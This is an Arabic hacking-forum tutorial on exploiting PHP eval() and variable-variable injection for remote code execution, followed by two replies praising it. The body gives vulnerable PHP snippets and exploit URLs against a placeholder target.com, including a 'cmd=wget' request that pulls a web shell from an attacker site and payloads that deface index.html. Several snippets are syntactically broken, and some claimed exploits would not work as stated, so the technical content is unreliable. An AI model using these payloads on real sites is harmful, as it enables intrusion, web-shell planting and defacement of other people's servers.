السلام عليكم ورحمة الله وبركاتة سلام يارجالة اخباركم ايه ؟ اليوم بنتكلم عن البحث عن الثغرات في المتغيرات الديناميكية وكلنا نعرف انه لغة بي اتش بي...

Injection

:: Interactive Developer ::
Dynamic Evaluation Variables | By Z3r0H4xor
السلام عليكم ورحمة الله وبركاتة

سلام يارجالة اخباركم ايه ؟

اليوم بنتكلم عن البحث عن الثغرات في المتغيرات الديناميكية وكلنا نعرف انه لغة بي اتش بي مهمة في الاختراق كثير واكتشاف الثغرات بشكل كبير لنة المخترق يعتمد على ثغره ليخترق موقع معين , ونعرف انه سكربتات معروفة مبرمجة بل بي اتش بي مثل " Wordpress , Mybb, Joomla " استغلال المتغيرات الديناميكة تقدر تقول RCE ( Remote Code Execution التي تسمح بتنفيذ امر معين

PHP:
Dynamic Evaluation Variables
تمام الان نبدا بـ


PHP:
Eval Injection
الـ Eval Injection معروفة بـ RCE لما الهكر يتحكم بل ( String ) وحالة حال eval()


مثال

PHP:
$common-variable = "command";
 $x = $_GET['arg'];
 eval("\$common-variable = \$x;");
نفس مانشوف مافيه علامة دولار في المتغير , يمكن ان نتخطاه عبر المدخلات الخاصة

وفي السطر الثاني التطبيق يسمح اننه ندخل واستخدام الـ $ للحصول على الارسال البيانات التطبيق
والخالدم لتنفيذها. ونحن ننظر في السطر الثالث ونشوف eval() وضيفتة يتم استدعاء
وهاذا تنفيذ سلاسل 2 المذكورة فوق وهاذا مثال بسيط عن استغلاله

PHP:
<?php
    $cmd=$_GET['cmd'];
    eval($cmd);
    ?>
الاستغلال يحلوين يكون بهاذا الشكل ض1


PHP:
http://www.target.com/php-files/input.php?cmd=wget  www.mysite.com/shell.php
نعرف انه فيه كثير ناس يحبون لغة البي اتش بي هي لفة بسيطة ولكنها قويه

الي تجي معها كثير وضايف , البي اتش بي يدعم المتغيرات وهي المتغيرات او التعيبرات
الي تقيم الى اسماء المتغيرات الاخرى < ~ مجرد تفكير في هاذا , ويقول لي ان لايسبب مشاكل
هذا التعبيرات ممكن استخدامها لتغير حيوي متغير الى يتم الوصول اليها او تععيين اثناء
تنفيذ البرنامج مريحة جدا ولكن فكر مره ثانية وراح يكون التفكير ان هاذا هو
غير امنة اذا لم تتم السيطرة على اسم المتغير او مظهره يمكن للمهاجم قراءة او كتابة
المتغيرات التعسفي مما تسبب حتى الان تنفيذ التعليمات البرمجية بعيد عن اخر .

مثال

PHP:
$var**** = "myvar";
 $$var**** = 10;
 echo $myvar;
هاذا بيطلب متغير $myvar وبيطبع الـ String عشرة " 10"


PHP:
$safevar = "Welcome to my site";
 $param1 = "";
 $param2 = "";
 $param3 = "";
 # my own "register globals" for param[1,2,3]
 foreach ($_GET as $key => $value) {
    $$key = $value;
    echo $value;
 }
زي مانسشوف الحين الملف يستخدم الطباعة Echo , Print ويطبع عباره " مرحبا بك في موقعي "

طبعا المخترق يقدر يستغل الثغره في متغير $safevar لشيء ثاني ولنقول مثلا
"echo Hacked By Z3r0 >> /home/var/www/public_html/index.html"

وتستغل بهاذي الطريقة

PHP:
 http://www.target.com/php-files/input.php?safevar=echo Hacked By  z3r0>> /home/var/www/public_html/index.html
&


PHP:
$function-**** = "myfunction";
 $Arg1 = "hello";
 $Arg2 = "welcome to my site";
 $$function-****("Arg1", "Arg2");
 echo $myfunction;
طريقة الاستغلال


PHP:
  http://www.target.com/php-files/input.php?Arg1=hello&Arg2=echo  Hacked By Z3r0 >>  /home/var/www/public_html/index.html
انتهينا من الدرس ض1 بس حاب انبهه الي ماعجبة الدرس مايرد ض1


كتبتة لنة الملل سوا فايدة كبيرة خخخخ

grt'z : Dr.Aadil, Mr.Hx , alzh3r, PreStiGe511, Nok511 , All Members
Mzh04208.gif
 

oblack

New Member
Dynamic Evaluation Variables | By Z3r0H4xor
رد: Dynamic Evaluation Variables | By Z3r0H4xor

درس رائع واتمنى للاستمرار بوضع شروحات متقدمة هل ممكن تعمل لنا دراسة حول سكربت wordpress بشكل بحث مدروس بدقة واسباب الصعوبة بستغلال الثغرات بهذا السكربت حتى نستطيع نتوصل الى طريقة لتخطي الحماايات بيه .
 

Saad Ghamdi

New Member
Dynamic Evaluation Variables | By Z3r0H4xor
رد: Dynamic Evaluation Variables | By Z3r0H4xor

يعطيك الف عافية درس أكثر من رائع وتشكر عليه
اتمنى نشوف لك شروحات اكثر يامبدع
 
أعلى